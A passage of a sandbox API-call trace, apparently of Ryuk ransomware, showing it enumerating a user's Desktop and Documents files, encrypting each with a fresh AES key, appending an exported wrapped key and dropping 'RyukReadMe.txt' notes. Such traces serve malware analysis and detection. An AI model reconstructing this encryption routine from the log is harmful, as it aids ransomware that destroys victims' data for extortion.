(in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0152.654] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0152.654] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\TLO6HzhIfrLz.mp3", dwFileAttributes=0x80) returned 1 [0152.654] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\TLO6HzhIfrLz.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tlo6hzhifrlz.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0152.655] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x29acfe8 | out: lpFileSize=0x29acfe8*=38007) returned 1 [0152.655] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x29acff8 | out: lpFileSize=0x29acff8*=38007) returned 1 [0152.655] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x9355, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0152.655] ReadFile (in: hFile=0x188, lpBuffer=0x29ad048, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ad008, lpOverlapped=0x0 | out: lpBuffer=0x29ad048*, lpNumberOfBytesRead=0x29ad008*=0x19, lpOverlapped=0x0) returned 1 [0152.656] SetFilePointer (in: hFile=0x188, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0152.656] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29acfd0 | out: phKey=0x29acfd0*=0x3b8690) returned 1 [0152.656] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0152.656] SetFilePointer (in: hFile=0x188, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0152.656] ReadFile (in: hFile=0x188, lpBuffer=0x2760000, nNumberOfBytesToRead=0x9477, lpNumberOfBytesRead=0x29acfe0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29acfe0*=0x9477, lpOverlapped=0x0) returned 1 [0152.657] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29acfdc*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29acfdc*=0xf4250) returned 1 [0152.657] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29acfd8*=0x9477, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29acfd8*=0x9480) returned 1 [0152.657] SetFilePointer (in: hFile=0x188, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0152.657] WriteFile (in: hFile=0x188, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x9480, lpNumberOfBytesWritten=0x29acfe0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29acfe0*=0x9480, lpOverlapped=0x0) returned 1 [0152.657] WriteFile (in: hFile=0x188, lpBuffer=0x29ad020*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29acfe4, lpOverlapped=0x0 | out: lpBuffer=0x29ad020*, lpNumberOfBytesWritten=0x29acfe4*=0x6, lpOverlapped=0x0) returned 1 [0152.657] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29acff0 | out: pbData=0x0*, pdwDataLen=0x29acff0*=0x10c) returned 1 [0152.658] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ad070, pdwDataLen=0x29acff0 | out: pbData=0x29ad070*, pdwDataLen=0x29acff0*=0x10c) returned 1 [0152.658] WriteFile (in: hFile=0x188, lpBuffer=0x29ad070*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29acfe4, lpOverlapped=0x0 | out: lpBuffer=0x29ad070*, lpNumberOfBytesWritten=0x29acfe4*=0x10c, lpOverlapped=0x0) returned 1 [0152.658] CloseHandle (hObject=0x188) returned 1 [0152.677] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0152.682] CryptDestroyKey (hKey=0x3b8690) returned 1 [0152.682] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0152.682] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0152.682] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0152.683] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\udD5j0X_z.swf", dwFileAttributes=0x80) returned 1 [0152.683] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\udD5j0X_z.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\udd5j0x_z.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0152.683] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x29acfe8 | out: lpFileSize=0x29acfe8*=68276) returned 1 [0152.683] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x29acff8 | out: lpFileSize=0x29acff8*=68276) returned 1 [0152.683] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x10992, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0152.683] ReadFile (in: hFile=0x188, lpBuffer=0x29ad048, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ad008, lpOverlapped=0x0 | out: lpBuffer=0x29ad048*, lpNumberOfBytesRead=0x29ad008*=0x19, lpOverlapped=0x0) returned 1 [0152.684] SetFilePointer (in: hFile=0x188, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0152.684] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29acfd0 | out: phKey=0x29acfd0*=0x3b8690) returned 1 [0152.684] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0152.684] SetFilePointer (in: hFile=0x188, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0152.684] ReadFile (in: hFile=0x188, lpBuffer=0x2760000, nNumberOfBytesToRead=0x10ab4, lpNumberOfBytesRead=0x29acfe0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29acfe0*=0x10ab4, lpOverlapped=0x0) returned 1 [0152.686] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29acfdc*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29acfdc*=0xf4250) returned 1 [0152.686] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29acfd8*=0x10ab4, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29acfd8*=0x10ac0) returned 1 [0152.686] SetFilePointer (in: hFile=0x188, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0152.686] WriteFile (in: hFile=0x188, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x10ac0, lpNumberOfBytesWritten=0x29acfe0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29acfe0*=0x10ac0, lpOverlapped=0x0) returned 1 [0152.687] WriteFile (in: hFile=0x188, lpBuffer=0x29ad020*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29acfe4, lpOverlapped=0x0 | out: lpBuffer=0x29ad020*, lpNumberOfBytesWritten=0x29acfe4*=0x6, lpOverlapped=0x0) returned 1 [0152.687] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29acff0 | out: pbData=0x0*, pdwDataLen=0x29acff0*=0x10c) returned 1 [0152.687] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ad070, pdwDataLen=0x29acff0 | out: pbData=0x29ad070*, pdwDataLen=0x29acff0*=0x10c) returned 1 [0152.687] WriteFile (in: hFile=0x188, lpBuffer=0x29ad070*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29acfe4, lpOverlapped=0x0 | out: lpBuffer=0x29ad070*, lpNumberOfBytesWritten=0x29acfe4*=0x10c, lpOverlapped=0x0) returned 1 [0152.687] CloseHandle (hObject=0x188) returned 1 [0152.710] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0152.715] CryptDestroyKey (hKey=0x3b8690) returned 1 [0152.715] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0152.715] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0152.715] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0152.715] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\VBaa.swf", dwFileAttributes=0x80) returned 1 [0152.716] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\VBaa.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\vbaa.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0152.716] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x29acfe8 | out: lpFileSize=0x29acfe8*=75977) returned 1 [0152.716] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x29acff8 | out: lpFileSize=0x29acff8*=75977) returned 1 [0152.716] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x127a7, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0152.716] ReadFile (in: hFile=0x188, lpBuffer=0x29ad048, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ad008, lpOverlapped=0x0 | out: lpBuffer=0x29ad048*, lpNumberOfBytesRead=0x29ad008*=0x19, lpOverlapped=0x0) returned 1 [0152.717] SetFilePointer (in: hFile=0x188, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0152.717] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29acfd0 | out: phKey=0x29acfd0*=0x3b8690) returned 1 [0152.717] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0152.717] SetFilePointer (in: hFile=0x188, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0152.717] ReadFile (in: hFile=0x188, lpBuffer=0x2760000, nNumberOfBytesToRead=0x128c9, lpNumberOfBytesRead=0x29acfe0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29acfe0*=0x128c9, lpOverlapped=0x0) returned 1 [0152.735] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29acfdc*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29acfdc*=0xf4250) returned 1 [0152.735] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29acfd8*=0x128c9, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29acfd8*=0x128d0) returned 1 [0152.735] SetFilePointer (in: hFile=0x188, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0152.735] WriteFile (in: hFile=0x188, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x128d0, lpNumberOfBytesWritten=0x29acfe0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29acfe0*=0x128d0, lpOverlapped=0x0) returned 1 [0152.736] WriteFile (in: hFile=0x188, lpBuffer=0x29ad020*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29acfe4, lpOverlapped=0x0 | out: lpBuffer=0x29ad020*, lpNumberOfBytesWritten=0x29acfe4*=0x6, lpOverlapped=0x0) returned 1 [0152.736] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29acff0 | out: pbData=0x0*, pdwDataLen=0x29acff0*=0x10c) returned 1 [0152.736] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ad070, pdwDataLen=0x29acff0 | out: pbData=0x29ad070*, pdwDataLen=0x29acff0*=0x10c) returned 1 [0152.736] WriteFile (in: hFile=0x188, lpBuffer=0x29ad070*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29acfe4, lpOverlapped=0x0 | out: lpBuffer=0x29ad070*, lpNumberOfBytesWritten=0x29acfe4*=0x10c, lpOverlapped=0x0) returned 1 [0152.736] CloseHandle (hObject=0x188) returned 1 [0152.756] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0152.761] CryptDestroyKey (hKey=0x3b8690) returned 1 [0152.761] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0152.761] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0152.761] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0152.762] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wNFHfLG7.flv", dwFileAttributes=0x80) returned 1 [0152.762] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wNFHfLG7.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\wnfhflg7.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0152.762] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x29acfe8 | out: lpFileSize=0x29acfe8*=67810) returned 1 [0152.762] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x29acff8 | out: lpFileSize=0x29acff8*=67810) returned 1 [0152.762] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x107c0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0152.762] ReadFile (in: hFile=0x188, lpBuffer=0x29ad048, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ad008, lpOverlapped=0x0 | out: lpBuffer=0x29ad048*, lpNumberOfBytesRead=0x29ad008*=0x19, lpOverlapped=0x0) returned 1 [0152.763] SetFilePointer (in: hFile=0x188, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0152.763] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29acfd0 | out: phKey=0x29acfd0*=0x3b8690) returned 1 [0152.763] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0152.763] SetFilePointer (in: hFile=0x188, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0152.763] ReadFile (in: hFile=0x188, lpBuffer=0x2760000, nNumberOfBytesToRead=0x108e2, lpNumberOfBytesRead=0x29acfe0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29acfe0*=0x108e2, lpOverlapped=0x0) returned 1 [0152.765] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29acfdc*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29acfdc*=0xf4250) returned 1 [0152.765] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29acfd8*=0x108e2, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29acfd8*=0x108f0) returned 1 [0152.765] SetFilePointer (in: hFile=0x188, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0152.765] WriteFile (in: hFile=0x188, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x108f0, lpNumberOfBytesWritten=0x29acfe0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29acfe0*=0x108f0, lpOverlapped=0x0) returned 1 [0152.766] WriteFile (in: hFile=0x188, lpBuffer=0x29ad020*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29acfe4, lpOverlapped=0x0 | out: lpBuffer=0x29ad020*, lpNumberOfBytesWritten=0x29acfe4*=0x6, lpOverlapped=0x0) returned 1 [0152.766] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29acff0 | out: pbData=0x0*, pdwDataLen=0x29acff0*=0x10c) returned 1 [0152.766] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ad070, pdwDataLen=0x29acff0 | out: pbData=0x29ad070*, pdwDataLen=0x29acff0*=0x10c) returned 1 [0152.766] WriteFile (in: hFile=0x188, lpBuffer=0x29ad070*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29acfe4, lpOverlapped=0x0 | out: lpBuffer=0x29ad070*, lpNumberOfBytesWritten=0x29acfe4*=0x10c, lpOverlapped=0x0) returned 1 [0152.766] CloseHandle (hObject=0x188) returned 1 [0152.789] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0152.794] CryptDestroyKey (hKey=0x3b8690) returned 1 [0152.794] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0152.794] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0152.794] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0152.794] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_R5iGA8tvAf3G.m4a", dwFileAttributes=0x80) returned 1 [0152.795] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_R5iGA8tvAf3G.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_r5iga8tvaf3g.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0152.795] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x29acfe8 | out: lpFileSize=0x29acfe8*=54092) returned 1 [0152.795] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x29acff8 | out: lpFileSize=0x29acff8*=54092) returned 1 [0152.795] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0xd22a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0152.795] ReadFile (in: hFile=0x188, lpBuffer=0x29ad048, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ad008, lpOverlapped=0x0 | out: lpBuffer=0x29ad048*, lpNumberOfBytesRead=0x29ad008*=0x19, lpOverlapped=0x0) returned 1 [0152.796] SetFilePointer (in: hFile=0x188, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0152.796] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29acfd0 | out: phKey=0x29acfd0*=0x3b8690) returned 1 [0152.796] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0152.796] SetFilePointer (in: hFile=0x188, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0152.796] ReadFile (in: hFile=0x188, lpBuffer=0x2760000, nNumberOfBytesToRead=0xd34c, lpNumberOfBytesRead=0x29acfe0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29acfe0*=0xd34c, lpOverlapped=0x0) returned 1 [0152.797] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29acfdc*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29acfdc*=0xf4250) returned 1 [0152.797] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29acfd8*=0xd34c, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29acfd8*=0xd350) returned 1 [0152.797] SetFilePointer (in: hFile=0x188, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0152.797] WriteFile (in: hFile=0x188, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0xd350, lpNumberOfBytesWritten=0x29acfe0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29acfe0*=0xd350, lpOverlapped=0x0) returned 1 [0152.798] WriteFile (in: hFile=0x188, lpBuffer=0x29ad020*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29acfe4, lpOverlapped=0x0 | out: lpBuffer=0x29ad020*, lpNumberOfBytesWritten=0x29acfe4*=0x6, lpOverlapped=0x0) returned 1 [0152.798] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29acff0 | out: pbData=0x0*, pdwDataLen=0x29acff0*=0x10c) returned 1 [0152.798] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ad070, pdwDataLen=0x29acff0 | out: pbData=0x29ad070*, pdwDataLen=0x29acff0*=0x10c) returned 1 [0152.798] WriteFile (in: hFile=0x188, lpBuffer=0x29ad070*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29acfe4, lpOverlapped=0x0 | out: lpBuffer=0x29ad070*, lpNumberOfBytesWritten=0x29acfe4*=0x10c, lpOverlapped=0x0) returned 1 [0152.798] CloseHandle (hObject=0x188) returned 1 [0152.815] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0152.822] CryptDestroyKey (hKey=0x3b8690) returned 1 [0152.822] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0152.822] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0 [0152.822] FindClose (in: hFindFile=0x3a2dc0 | out: hFindFile=0x3a2dc0) returned 1 [0152.822] SetLastError (dwErrCode=0x0) [0152.822] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x184 [0152.822] GetLastError () returned 0xb7 [0152.822] CloseHandle (hObject=0x184) returned 1 [0152.822] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0152.822] SetLastError (dwErrCode=0x0) [0152.822] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x184 [0152.822] GetLastError () returned 0xb7 [0152.822] CloseHandle (hObject=0x184) returned 1 [0152.822] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*.*", lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0x3a2dc0 [0152.823] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0152.823] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0152.823] SetLastError (dwErrCode=0x0) [0152.823] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0152.823] GetLastError () returned 0x0 [0152.823] WriteFile (in: hFile=0x188, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29ad1f0*=0x320, lpOverlapped=0x0) returned 1 [0152.824] CloseHandle (hObject=0x188) returned 1 [0152.824] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\-PjmXzfFQ-addFOR\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3a2e20 [0152.824] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0152.824] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0152.824] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0152.824] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\-PjmXzfFQ-addFOR\\3X7QIdSSmv5R8e.pps", dwFileAttributes=0x80) returned 1 [0152.825] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\-PjmXzfFQ-addFOR\\3X7QIdSSmv5R8e.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\-pjmxzffq-addfor\\3x7qidssmv5r8e.pps"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0152.825] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac838 | out: lpFileSize=0x29ac838*=56829) returned 1 [0152.825] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac848 | out: lpFileSize=0x29ac848*=56829) returned 1 [0152.825] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0xdcdb, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0152.825] ReadFile (in: hFile=0x18c, lpBuffer=0x29ac898, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ac858, lpOverlapped=0x0 | out: lpBuffer=0x29ac898*, 